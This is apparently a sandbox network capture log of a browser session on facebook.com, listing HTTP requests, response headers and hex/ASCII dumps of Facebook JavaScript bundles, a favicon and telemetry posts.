2023-05-15 17:27:03 UTC	3494	IN	Data Raw: 28 63 29 3b 72 65 74 75 72 6e 20 77 2e 5f 70 6f 73 74 53 69 67 6e 61 6c 73 48 65 6c 70 65 72 28 62 2c 61 29 7d 2c 63 6f 6c 6c 65 63 74 53 74 61 74 69 63 53 69 67 6e 61 6c 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 28 22 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74 69 6d 65 22 29 2e 61 73 79 6e 63 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 77 68 69 6c 65 28 31 29 73 77 69 74 63 68 28 61 2e 70 72 65 76 3d 61 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 61 2e 6e 65 78 74 3d 32 3b 72 65 74 75 72 6e 20 62 28 22 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74 69 6d 65 22 29 2e 61 77 72 61 70 28 77 2e 63 6f 6c 6c 65 63 74 53 69 67 6e 61 6c 73 4f 6e 65 54 69 6d 65 28 75 2e 67 65 74 53 74 61 74 69 63 53 69 67 6e 61 6c 73 28 29 29 29 3b 63 61 73 65 20 32 Data Ascii: (c);return w._postSignalsHelper(b,a)},collectStaticSignals:function(){return b("regeneratorRuntime").async(function(a){while(1)switch(a.prev=a.next){case 0:a.next=2;return b("regeneratorRuntime").awrap(w.collectSignalsOneTime(u.getStaticSignals()));case 2

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:03 UTC	3419	OUT	GET /rsrc.php/v3/yS/r/rO5OX6VwE2P.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" Origin: https://www.facebook.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://www.facebook.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:03 UTC	3422	IN	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT Content-MD5: Mhp+9EBVzVbZncv+v5auRA== Expires: Sat, 04 May 2024 02:12:09 GMT Cache-Control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff timing-allow-origin: * origin-agent-cluster: ?0 X-FB-Debug: cgphU1KQ5rdiD0XgCNmAJsvpwwFPxNxybLmw1rL7Dc8/8sBOXDpGfcpf8ha5n1Fwr1ghNq7Rth43o0o+ZIrNOw== X-FB-TRIP-ID: 1679558926 Date: Mon, 15 May 2023 17:27:03 GMT Access-Control-Allow-Origin: https://www.facebook.com Vary: Origin Alt-Svc: h3=":443"; ma=86400 Connection: close Content-Length: 7363
2023-05-15 17:27:03 UTC	3423	IN	Data Raw: 3b Data Ascii: ;
2023-05-15 17:27:03 UTC	3423	IN	Data Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 43 61 63 68 65 53 74 6f 72 61 67 65 22 2c 5b 22 43 6f 6d 65 74 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 28 22 43 6f 6d 65 74 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 43 61 63 68 65 53 74 6f 72 61 67 65 22 2c 5b 22 45 72 72 6f 72 47 75 61 72 64 22 2c 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 43 61 63 68 65 53 74 6f 72 61 67 65 22 2c 22 45 78 65 63 75 74 69 6f 6e 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 22 46 42 4a Data Ascii: /FB_PKG_DELIM/__d("EventListenerImplForCacheStorage",["CometEventListener"],(function(a,b,c,d,e,f){"use strict";f["default"]=b("CometEventListener")}),66);__d("CacheStorage",["ErrorGuard","EventListenerImplForCacheStorage","ExecutionEnvironment","FBJ
2023-05-15 17:27:03 UTC	3424	IN	Data Raw: 7d 3b 72 65 74 75 72 6e 20 62 7d 28 61 29 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 5f 73 74 6f 72 65 3d 7b 7d 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 67 65 74 53 74 6f 72 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 74 6f 72 65 7d 3b 62 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 68 69 73 2e 5f 73 74 6f 72 65 29 7d 3b 62 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 74 6f 72 65 5b 61 5d 3d 3d 3d 76 6f 69 64 20 30 3f 6e 75 6c 6c 3a 74 68 69 73 2e 5f 73 74 6f 72 65 5b 61 5d 7d 3b 62 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e Data Ascii: };return b}(a);var l=function(){function a(){this._store={}}var b=a.prototype;b.getStore=function(){return this._store};b.keys=function(){return Object.keys(this._store)};b.get=function(a){return this._store[a]===void 0?null:this._store[a]};b.set=function

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:03 UTC	3419	OUT	GET /rsrc.php/v3iX3c4/yO/l/en_GB/c78rBSKGb1H.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" Origin: https://www.facebook.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://www.facebook.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:03 UTC	3430	IN	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT Content-MD5: NJYexyyprHLFzjZck05xiw== Expires: Tue, 07 May 2024 04:32:49 GMT Cache-Control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top permissions-policy: accelerometer=() cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff timing-allow-origin: * X-FB-Debug: zRKECCYcZoeJDfJQzztVbkT8/DOsht/muoUJQSX8S+S5mT8YCquUzi9ajIV/sOj89kBSdN6OY04dY3IpAn/mXQ== X-FB-TRIP-ID: 1679558926 Date: Mon, 15 May 2023 17:27:03 GMT Access-Control-Allow-Origin: https://www.facebook.com Vary: Origin Alt-Svc: h3=":443"; ma=86400 Connection: close Content-Length: 38570
2023-05-15 17:27:03 UTC	3431	IN	Data Raw: 3b Data Ascii: ;
2023-05-15 17:27:03 UTC	3446	IN	Data Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 69 73 41 64 73 45 78 63 65 6c 41 64 64 69 6e 55 52 49 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 76 61 72 20 67 3d 6e 65 77 20 52 65 67 45 78 70 28 22 28 5e 7c 5c 5c 2e 29 66 62 61 64 64 69 6e 73 5c 5c 2e 63 6f 6d 24 22 2c 22 69 22 29 2c 68 3d 5b 22 68 74 74 70 73 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 69 66 28 61 2e 69 73 45 6d 70 74 79 28 29 26 26 61 2e 74 6f 53 74 72 69 6e 67 28 29 21 3d 3d 22 23 22 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 61 2e 67 65 74 44 6f 6d 61 69 6e 28 29 26 26 21 61 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 28 29 3f 21 31 3a 68 2e 69 6e 64 65 78 4f 66 28 61 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 28 29 29 21 Data Ascii: /FB_PKG_DELIM/__d("isAdsExcelAddinURI",[],(function(a,b,c,d,e,f){var g=new RegExp("(^\|\\.)fbaddins\\.com$","i"),h=["https"];function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;return!a.getDomain()&&!a.getProtocol()?!1:h.indexOf(a.getProtocol())!
2023-05-15 17:27:03 UTC	3495	IN	Data Raw: 2c 5b 22 69 6e 76 61 72 69 61 6e 74 22 2c 22 70 65 72 66 6f 72 6d 61 6e 63 65 41 62 73 6f 6c 75 74 65 4e 6f 77 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 76 61 72 20 69 3d 30 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 61 7c 7c 68 28 30 2c 31 34 39 36 29 2c 22 63 61 74 65 67 6f 72 79 22 69 6e 20 61 26 26 22 64 65 73 63 72 69 70 74 69 6f 6e 22 69 6e 20 61 7c 7c 68 28 30 2c 33 31 33 38 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 29 2c 74 68 69 73 2e 24 31 3d 21 31 2c 74 68 69 73 2e 24 32 3d 62 61 62 65 6c 48 65 6c 70 65 72 73 5b 22 65 78 74 65 6e 64 73 22 5d 28 7b 7d 2c 61 2c 7b 69 64 3a 28 69 2b 2b 29 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 7d 29 2c 74 68 69 73 Data Ascii: ,["invariant","performanceAbsoluteNow"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a\|\|h(0,1496),"category"in a&&"description"in a\|\|h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:(i++).toString(36)}),this
2023-05-15 17:27:03 UTC	3511	IN	Data Raw: 68 69 6c 65 28 63 3d 62 2e 64 65 71 75 65 75 65 49 74 65 6d 28 29 29 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 58 28 63 2e 69 74 65 6d 29 3f 28 50 28 63 2e 69 74 65 6d 2e 6e 61 6d 65 2c 22 6a 73 2e 75 73 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 2e 6c 6f 67 22 2c 31 2c 21 30 29 2c 57 28 29 2c 78 3d 3d 6e 75 6c 6c 26 26 28 78 3d 73 65 74 54 69 6d 65 6f 75 74 28 49 2c 6a 29 29 2c 65 26 26 21 61 28 64 29 26 26 28 63 2e 69 74 65 6d 2e 69 64 65 6e 74 69 74 79 3d 65 29 2c 48 28 62 2c 63 29 29 3a 28 50 28 63 2e 69 74 65 6d 2e 6e 61 6d 65 2c 22 6a 73 2e 75 73 65 5f 62 61 6e 7a 61 69 2e 6c 6f 67 22 2c 31 2c 21 30 29 2c 65 26 26 28 63 2e 69 74 65 6d 2e 69 64 65 6e 74 69 74 79 3d 65 29 2c 51 2e 6c 6f 67 28 5b 63 2e 69 74 65 6d 5d 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 Data Ascii: hile(c=b.dequeueItem())(function(c){X(c.item)?(P(c.item.name,"js.use_bladerunner.log",1,!0),W(),x==null&&(x=setTimeout(I,j)),e&&!a(d)&&(c.item.identity=e),H(b,c)):(P(c.item.name,"js.use_banzai.log",1,!0),e&&(c.item.identity=e),Q.log([c.item],function(a){r

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:03 UTC	3517	OUT	POST /ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19492.BP%3ADEFAULT.2.0..0.0&__hsi=7233462025865615515&__req=1&__rev=1007493981&__s=%3A%3A0xhq8e&__spin_b=trunk&__spin_r=1007493981&__spin_t=1684171619&__user=0&dpr=1&jazoest=2939&lsd=AVpSfLhw8T4 HTTP/1.1 Host: www.facebook.com Connection: keep-alive Content-Length: 898 sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypY2RqJPQagHp0hIB Accept: / Origin: https://www.facebook.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareershttps%253A%252F%252Fwww.facebook.com%252Fprivacy%252Fpolicies%252Fcookies%252F%253Fentry_point%253Dcookie_policy_redirect%26entry%3D0https%253A%252F%252Fbusiness.facebook.com%252Fbusiness%252Fhelp Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:03 UTC	3518	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 70 59 32 52 71 4a 50 51 61 67 48 70 30 68 49 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 36 38 34 31 37 31 36 32 32 36 37 37 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 70 59 32 52 71 4a 50 51 61 67 48 70 30 68 49 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 75 73 65 72 22 3a 22 30 22 2c 22 77 65 62 53 65 73 73 69 6f 6e 49 64 22 3a 22 3a 3a 30 78 68 71 38 65 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 70 6f 73 Data Ascii: ------WebKitFormBoundarypY2RqJPQagHp0hIBContent-Disposition: form-data; name="ts"1684171622677------WebKitFormBoundarypY2RqJPQagHp0hIBContent-Disposition: form-data; name="q"[{"user":"0","webSessionId":"::0xhq8e","app_id":"256281040558","pos
2023-05-15 17:27:03 UTC	3519	IN	HTTP/1.1 200 OK x-fb-rlafr: 0 report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} content-security-policy: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com .fbcdn.net 'unsafe-eval';script-src .facebook.com .fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com:* wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; document-policy: force-load-at-top permissions-policy: accelerometer=() cross-origin-resource-policy: cross-origin cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report" cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Access-Control-Expose-Headers: X-FB-Debug, X-Loader-Length Access-Control-Allow-Methods: OPTIONS Access-Control-Allow-Credentials: true
2023-05-15 17:27:03 UTC	3521	IN	Data Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 31 35 35 35 32 30 30 30 3b 20 70 72 65 6c 6f 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 0d 0a 58 2d 46 42 2d 44 65 62 75 67 3a 20 71 6e 78 47 61 38 52 38 30 77 73 69 65 6e 57 53 48 66 67 6c 73 70 2f 6f 32 70 70 71 41 4e 37 35 58 38 62 56 6f 70 6b 4b 57 48 6b 65 65 71 46 6d 66 68 59 77 46 36 65 33 6c 46 4c 38 34 78 6c 34 45 75 74 48 77 72 6c 68 72 6a 45 45 38 71 Data Ascii: Access-Control-Allow-Origin: https://www.facebook.comVary: OriginStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: qnxGa8R80wsienWSHfglsp/o2ppqAN75X8bVopkKWHkeeqFmfhYwF6e3lFL84xl4EutHwrlhrjEE8q

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:03 UTC	3522	OUT	GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1 Host: static.xx.fbcdn.net Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.facebook.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:03 UTC	3524	IN	HTTP/1.1 200 OK Content-Type: image/x-icon Access-Control-Allow-Origin: * Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT Content-MD5: jN3KQn2um5Jec0MvhzPgWg== Expires: Thu, 09 May 2024 23:58:01 GMT Cache-Control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top permissions-policy: accelerometer=() cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff timing-allow-origin: * origin-agent-cluster: ?0 X-FB-Debug: vAaf09s2ET50pCDgqZkNXeI0cFMWW4xVUr1MVBHLr87GoNZ6OUfs2y6tB2XMvEGxGB2ecOoECA56QYTzr5VFAg== X-FB-TRIP-ID: 1679558926 Date: Mon, 15 May 2023 17:27:03 GMT Alt-Svc: h3=":443"; ma=86400 Connection: close Content-Length: 4286
2023-05-15 17:27:03 UTC	3524	IN	Data Raw: 00 Data Ascii:
2023-05-15 17:27:03 UTC	3524	IN	Data Raw: 00 01 00 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 c2 1e 00 00 c2 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 00 06 e2 65 04 47 e0 63 00 95 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e0 64 00 bf e0 63 00 95 e2 65 00 47 ff 80 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 6a 0b 18 e2 66 02 96 e1 66 01 f1 e2 66 01 ff e1 65 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: ( @ eGcdceGjfffe
2023-05-15 17:27:03 UTC	3526	IN	Data Raw: ff eb 7e 09 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f3 b3 6e ff eb 7e 09 ff ec 7e 09 ff eb 7e 09 ff eb 7e 09 ff eb 7e 09 ff eb 7e 09 ff eb 7e 09 ff eb 7e 09 ff ed 81 0b 47 ec 80 0a 95 ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f5 c2 8a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 0a ff ec 80 09 ff ec 80 0a ff ec 80 09 ff ec 80 09 ff ec 80 0a 95 ee 83 0b bf ed 83 0b ff ed 83 0b ff ed 82 0a ff ed 83 0b ff ed 82 0a ff ed 82 0a ff ed 82 Data Ascii: ~n~~~~~~~~G

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:27:03 UTC	3522	OUT	GET /data/manifest/ HTTP/1.1 Host: www.facebook.com Connection: keep-alive sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: manifest Referer: https://www.facebook.com/login/?next=https%3A%2F%2Fbusiness.facebook.com%2FMetaforBusiness%3Fref%3Dfbb_footerhttps%253A%252F%252Fwww.instagram.com%252Fmetaforbusiness%252F%253Fref%253Dfbb_ens%26fbclid%3DIwAR0K-VSLpwbPDml5Nq79p7i-klyD3D359poe7eMDLdwYhnCxPhey9CYyXYIhttps%253A%252F%252Ftwitter.com%252FMetaforBusiness%253Ffbclid%253DIwAR2BmJUpYErfytJHFwQ6gdnVhQc8ikz8H-U86al8eecNNCkhb6nwFj2013khttps%253A%252F%252Fwww.linkedin.com%252Fshowcase%252Fmetaforbusiness%253Ffbclid%253DIwAR3Ypw4qNE4dRBrskqGWFv-z7QAVGrgl43SW-jHfiV8EL0QjGXU8ot021Oghttps%253A%252F%252Fabout.meta.com%252F%253Futm_source%253Dabout.facebook.com%26utm_medium%3Dredirecthttps%253A%252F%252Fdevelopers.facebook.com%252Fhttps%253A%252F%252Fwww.facebook.com%252Fcareershttps%253A%252F%252Fwww.facebook.com%252Fprivacy%252Fpolicies%252Fcookies%252F%253Fentry_point%253Dcookie_policy_redirect%26entry%3D0https%253A%252F%252Fbusiness.facebook.com%252Fbusiness%252Fhelp Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:27:03 UTC	3528	IN	HTTP/1.1 200 OK Vary: Accept-Encoding Content-Type: application/json report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 content-security-policy: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com .fbcdn.net 'unsafe-eval';script-src .facebook.com .fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com:* wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; document-policy: force-load-at-top permissions-policy: accelerometer=(), idle-detection=(), screen-wake-lock=() cross-origin-resource-policy: same-origin cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report" cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload
2023-05-15 17:27:03 UTC	3530	IN	Data Raw: 58 2d 46 42 2d 44 65 62 75 67 3a 20 37 2f 53 53 56 55 4f 71 37 68 69 68 49 58 68 58 33 69 78 54 2f 4b 34 2b 65 67 4b 50 49 6f 78 72 72 57 65 31 46 47 34 79 33 30 67 49 4d 41 74 50 41 70 4c 38 42 5a 47 7a 44 4a 74 71 75 38 47 47 56 4a 52 6d 59 7a 6f 4b 79 45 34 4c 6d 31 68 69 53 2f 33 33 32 67 3d 3d 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 35 20 4d 61 79 20 32 30 32 33 20 31 37 3a 32 37 3a 30 33 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: X-FB-Debug: 7/SSVUOq7hihIXhX3ixT/K4+egKPIoxrrWe1FG4y30gIMAtPApL8BZGzDJtqu8GGVJRmYzoKyE4Lm1hiS/332g==Date: Mon, 15 May 2023 17:27:03 GMTTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400Connection: close
